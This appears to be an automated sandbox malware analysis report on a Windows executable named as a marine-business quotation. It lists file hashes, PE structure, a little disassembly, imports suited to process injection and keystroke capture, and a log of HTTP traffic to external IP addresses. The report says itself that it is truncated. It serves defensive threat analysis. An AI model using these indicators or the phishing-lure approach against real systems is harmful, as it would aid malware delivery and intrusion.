• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: QUOTATION#070125-ELITE MARINE .exe
Time    Type    Description
10:47:50    API Interceptor    22291886x Sleep call for process: cmdkey.exe modified
                                                                          Process:C:\Windows\SysWOW64\cmdkey.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):135168
                                                                          Entropy (8bit):1.1142956103012707
                                                                          Encrypted:false
                                                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                          MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                          SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                          SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                          SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Process:C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):288256
                                                                          Entropy (8bit):7.994161087443874
                                                                          Encrypted:true
                                                                          SSDEEP:6144:TR3SdWrUsHs2wQb50ccdixlgFbRX9cSaCRLi7QbztVprXbAgj3:TgMs2wQb5patX9c0RLimjka
                                                                          MD5:2F4CA8506AC4A0AE022B5EB39877BC8E
                                                                          SHA1:82431BF0F771A07F1086C536C60818CD91C73E11
                                                                          SHA-256:7F6E2C96C0C37B18E883B12BF2981A4925B9903D0C7B065893408F0C30EA30EC
                                                                          SHA-512:0F836451F6896E445074B947463F43E681FEC467C7205BE926372CD003E76AC4B2E7ACDC74EA140FF8E87B15657327C52FC7B074808DEE3226161B09605E1A46
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.426580759981662
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:QUOTATION#070125-ELITE MARINE .exe
                                                                          File size:1'749'504 bytes
                                                                          MD5:71a9653e383348db78edaa7619dea426
                                                                          SHA1:4670f01da3fe979ffe6c27ef16080cdb71c03770
                                                                          SHA256:8cf3f5031f2201c448b2dc53d88b0a2142797116a6781d0f1222733127711add
                                                                          SHA512:05ef9586056b2921a6a893afc244e98060728dab665396a3e94612bc4f3c16c5faa7d4ac6b13e70b8f47c3b25aeda4e04ce30b74e8ca016bab9aa479bdffa259
                                                                          SSDEEP:24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8aU3X3N5RrgedytPHS12D95/KvAr:7TvC/MTQYxsWR7aUH3N5Knfs2D95/6
                                                                          TLSH:E885E1023781C022FF9B95330BA7F7158BBC6A260527A51F13981DB9BE705B1563E7A3
                                                                          Icon Hash:333333ab693b9b98
                                                                          Entrypoint:0x420577
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x677DC322 [Wed Jan 8 00:13:22 2025 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:948cc502fe9226992dce9417f952fce3
                                                                          Instruction
                                                                          call 00007F23704C2A03h
                                                                          jmp 00007F23704C230Fh
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007F23704C24EDh
                                                                          mov dword ptr [esi], 0049FDF0h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007F23704C24BAh
                                                                          mov dword ptr [esi], 0049FE0Ch
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                                          mov dword ptr [ecx], 0049FE0Ch
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDD0h
                                                                          and dword ptr [eax], 00000000h
                                                                          and dword ptr [eax+04h], 00000000h
                                                                          push eax
                                                                          mov eax, dword ptr [ebp+08h]
                                                                          add eax, 04h
                                                                          push eax
                                                                          call 00007F23704C50ADh
                                                                          pop ecx
                                                                          pop ecx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          lea eax, dword ptr [ecx+04h]
                                                                          mov dword ptr [ecx], 0049FDD0h
                                                                          push eax
                                                                          call 00007F23704C50F8h
                                                                          pop ecx
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 0049FDD0h
                                                                          push eax
                                                                          call 00007F23704C50E1h
                                                                          test byte ptr [ebp+08h], 00000001h
                                                                          pop ecx
                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xd4730 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a9000 | 0x7594 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xd4000 | 0xd4730 | 0xd4800 | 5c662028dfbadfd7ddda2fd58077e9fb | False | 0.9284214154411765 | data | 7.900006171123141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x1a9000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xd4548 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xd4670 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xd4798 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xd48c0 | 0x10d8b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9989130907351854 |
| RT_ICON | 0xe564c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | Great Britain | 0.42335561339169525 |
| RT_ICON | 0xf5e74 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | Great Britain | 0.5058455361360416 |
| RT_ICON | 0xfa09c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | Great Britain | 0.5346473029045643 |
| RT_ICON | 0xfc644 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | Great Britain | 0.6055347091932458 |
| RT_ICON | 0xfd6ec | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | Great Britain | 0.7225177304964538 |
| RT_MENU | 0xfdb54 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0xfdba4 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0xfe138 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0xfe7c4 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0xfec54 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xff250 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xff8ac | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0xffd14 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0xffe6c | 0xa8360 | data | | | 1.0003207584413172 |
| RT_GROUP_ICON | 0x1a81cc | 0x5a | Targa image data - Map 32 x 3467 x 1 +1 | English | Great Britain | 0.7888888888888889 |
| RT_GROUP_ICON | 0x1a8228 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x1a823c | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x1a8250 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x1a8264 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x1a8340 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
                                                                          DLLImport
                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                          UxTheme.dllIsThemeActive
                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, 
SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll: GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll: EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll: DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system: English
Country where language is spoken: Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Jan 9, 2025 16:48:06.541006088 CET8049753104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:48:11.606528997 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:11.778832912 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.779076099 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:11.785504103 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:11.958297014 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.979461908 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.979487896 CET8049754199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:11.979736090 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:13.294728994 CET4975480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.311619997 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.484096050 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.484297991 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.490849018 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:14.663841963 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.679184914 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.679210901 CET8049755199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:14.679446936 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:15.997554064 CET4975580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.014287949 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.187020063 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.187381029 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.193728924 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:17.367017031 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.367063046 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.367093086 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.367120028 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.382185936 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.382267952 CET8049756199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:17.382857084 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:18.700189114 CET4975680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:19.716839075 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:19.889671087 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:19.889986038 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:19.894273996 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:20.067306995 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:20.080899954 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:20.080950975 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:20.081387997 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:20.082808971 CET4975780192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:48:20.255248070 CET8049757199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:48:34.517446995 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:34.818049908 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:34.818365097 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:34.821835041 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:35.122415066 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:35.800178051 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:35.800226927 CET804975847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:35.800442934 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:36.336872101 CET4975880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.352585077 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.657780886 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:37.658051968 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.664752007 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:37.969996929 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:38.696535110 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:38.696552038 CET804975947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:38.696763039 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:39.180054903 CET4975980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.195636034 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.495326042 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.495528936 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.502289057 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.502326012 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:40.802182913 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.802391052 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.802651882 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.802882910 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:40.803122044 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:41.498956919 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:41.498977900 CET804976047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:41.499192953 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:42.007590055 CET4976080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.023248911 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.337007046 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:43.337404013 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.342102051 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:43.655563116 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:44.345208883 CET804976147.83.1.90192.168.11.20
